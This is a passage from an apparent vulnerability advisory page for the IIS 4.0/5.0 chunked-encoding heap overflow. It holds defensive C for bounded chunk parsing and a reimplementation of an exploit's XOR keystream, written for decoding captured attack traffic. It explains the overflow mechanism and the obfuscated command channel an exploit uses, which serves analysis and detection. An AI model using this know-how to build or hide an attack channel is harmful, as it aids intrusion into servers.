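        if (v > (LENGTH_LIMIT - d) >> 4) return CHUNK_ERR_SIZE_RANGE; /* v*16+d would exceed it */
        v = (v << 4) | d;
        digits++;
    }
    if (digits == 0) return CHUNK_ERR_SYNTAX;
    while (i < n && p[i] != '\r') i++;                /* chunk extensions are ignored */
    if (i + 1 >= n || p[i + 1] != '\n') return CHUNK_ERR_SYNTAX;
    *size = v;
    *adv = i + 2;
    return CHUNK_OK;
}

/* Decode a chunked body into out[0..outcap). Each chunk is checked against the
 * space left in out before anything is copied; that is the check whose absence
 * lets an attacker-chosen size become a heap overwrite. */
static enum chunk_status decode_chunked(const char *in, size_t inlen,
                                        char *out, size_t outcap, size_t *outlen)
{
    size_t pos = 0, used = 0;
    *outlen = 0;
    for (;;) {
        uint32_t size;
        size_t adv;
        enum chunk_status st = parse_chunk_size(in + pos, inlen - pos, &size, &adv);
        if (st != CHUNK_OK) return st;
        pos += adv;
        if (size == 0) { *outlen = used; return CHUNK_OK; }   /* last-chunk */
        if (size > outcap - used) return CHUNK_ERR_TOO_LARGE;
        if (size > inlen - pos) return CHUNK_ERR_TRUNCATED;
        memcpy(out + used, in + pos, size);
        used += size;
        pos += size;
        if (pos + 2 > inlen || in[pos] != '\r' || in[pos + 1] != '\n') return CHUNK_ERR_SYNTAX;
        pos += 2;
    }
}

/* Demo wrappers over a 64-byte output buffer. */
static int decode_status(const char *body, size_t outcap)
{
    char out[64]; size_t n;
    if (outcap > sizeof out) outcap = sizeof out;
    return (int)decode_chunked(body, strlen(body), out, outcap, &n);
}

static int decode_matches(const char *body, const char *expected)
{
    char out[64]; size_t n;
    if (decode_chunked(body, strlen(body), out, sizeof out, &n) != CHUNK_OK) return 0;
    return n == strlen(expected) && memcmp(out, expected, n) == 0;
}

int main(void)
{
    /* constructed sample bodies */
    printf("well-formed body decodes: %d\n", decode_matches("5\r\nhello\r\n6\r\n world\r\n0\r\n\r\n", "hello world"));
    printf("chunk size 80000000: status %d\n", decode_status("80000000\r\n", 64));
    printf("Content-length 2147506431 -> %lld\n", content_length_value("2147506431"));
    return 0;
}
```

The limit is deliberately 0x7fffffff rather than 0xffffffff: a size that fits in 32 bits but not in a signed 32-bit int is exactly the value a signed comparison waves through, so it is rejected at the digit that would cross the limit, before any multiply or shift.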
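Once the payload is running, the listing's command channel (iiscmd, iisput, iisget and the shellcode's "size", "reset" and "iisrr" handling) is XORed byte by byte with a keystream derived from LOCKBIGNUM and LOCKBIGNUM2 in newsend()/newrecv() on the client and in the matching loops in shellcodefn(), and the client only starts decoding after a server reply contains "XORDATA". The C below is an added, stand-alone reimplementation of that keystream for decoding a capture of this traffic; it is not code from the listing. It assumes the 32-bit wrapping multiply the original relies on (signed overflow, undefined in standard C but wrapping on the 32-bit MSVC build the listing targets), treats each direction as an independently seeded stream, as the listing's separate lockintvar1/lockintvar2 do, and uses a seed of 0 for the "notx" case where the shellcode disables the obfuscation. The sample reply and command are constructed.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define LOCKBIGNUM  19999999
#define LOCKBIGNUM2 13579139

/* One direction of the channel. Client and shellcode each keep an independent
 * state per direction; all four start from the same seed. */
struct xor_stream { int32_t state; };

static void xor_stream_init(struct xor_stream *s, int32_t seed)
{
    s->state = seed % LOCKBIGNUM;   /* LOCKBIGNUM2 normally; 0 when the query carried "notx" */
}

/* Next keystream byte. The listing computes state = state*0x100 in a 32-bit
 * int, which overflows on the very first step; the product is therefore taken
 * modulo 2^32 and reinterpreted as signed, and '%' keeps C's truncating
 * semantics (the remainder takes the sign of the dividend), as the original did. */
static uint8_t xor_stream_next(struct xor_stream *s)
{
    uint32_t prod = (uint32_t)s->state * 0x100u;
    int32_t v = (int32_t)prod;      /* two's-complement reinterpretation (gcc, clang, MSVC) */
    v %= LOCKBIGNUM;
    s->state = v;
    return (uint8_t)(v % 0x100);    /* same bit pattern the listing's char lockcharvar holds */
}

/* XOR len bytes in place; encoding and decoding are the same operation. */
static void xor_stream_apply(struct xor_stream *s, uint8_t *buf, size_t len)
{
    size_t i;
    for (i = 0; i < len; i++) buf[i] ^= xor_stream_next(s);
}

/* newrecv() begins decoding at the byte after "XORDATA" plus one more; return
 * that offset within a captured server reply, or -1 if the marker is absent. */
static long xor_stream_start(const uint8_t *buf, size_t len)
{
    size_t i;
    for (i = 0; i + 7 <= len; i++)
        if (memcmp(buf + i, "XORDATA", 7) == 0) return (long)(i + 8);
    return -1;
}

/* n-th byte of a fresh, default-seeded keystream, for checking against a capture. */
static uint8_t keystream_byte(size_t n)
{
    struct xor_stream s;
    uint8_t b = 0;
    size_t i;
    xor_stream_init(&s, LOCKBIGNUM2);
    for (i = 0; i <= n; i++) b = xor_stream_next(&s);
    return b;
}

/* Encode a command the way newsend() does, then decode it with a fresh stream
 * the way the shellcode does; 1 if the round trip is exact and the wire bytes
 * differ from the plaintext. */
static int roundtrip_ok(const char *cmd)
{
    uint8_t wire[64], plain[64];
    struct xor_stream tx, rx;
    size_t len = strlen(cmd);
    if (len > sizeof wire) return 0;
    memcpy(wire, cmd, len);
    xor_stream_init(&tx, LOCKBIGNUM2);
    xor_stream_apply(&tx, wire, len);
    if (memcmp(wire, cmd, len) == 0) return 0;
    memcpy(plain, wire, len);
    xor_stream_init(&rx, LOCKBIGNUM2);
    xor_stream_apply(&rx, plain, len);
    return memcmp(plain, cmd, len) == 0;
}

int main(void)
{
    const uint8_t reply[] = "HTTP/1.1 200 OK\r\nXORDATA\0...";   /* constructed reply */
    printf("first keystream bytes: %02x %02x\n", keystream_byte(0), keystream_byte(1));
    printf("decoding starts at offset %ld\n", xor_stream_start(reply, sizeof reply - 1));
    printf("round trip of \"iisc dir\\r\\n\": %d\n", roundtrip_ok("iisc dir\r\n"));
    return 0;
}
```

Because the seed is a fixed constant and the generator has no per-session input, the whole channel is decodable from the capture alone: feed the bytes after the XORDATA marker into one stream and the client's sends into another, both initialised with LOCKBIGNUM2. The "reset" command and iisreset() on the client re-seed both sides, so a decoder has to do the same when it sees the "xordatareset" reply.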

Products Mentioned

Configuration 0

Microsoft>>Internet_information_server >> Version 4.0

Microsoft>>Internet_information_services >> Version 5.0

References

http://www.kb.cert.org/vuls/id/610291
Tags : third-party-advisory, x_refsource_CERT-VN
http://www.securityfocus.com/bid/4485
Tags : vdb-entry, x_refsource_BID
http://marc.info/?l=bugtraq&m=101846993304518&w=2
Tags : mailing-list, x_refsource_BUGTRAQ
http://www.cert.org/advisories/CA-2002-09.html
Tags : third-party-advisory, x_refsource_CERT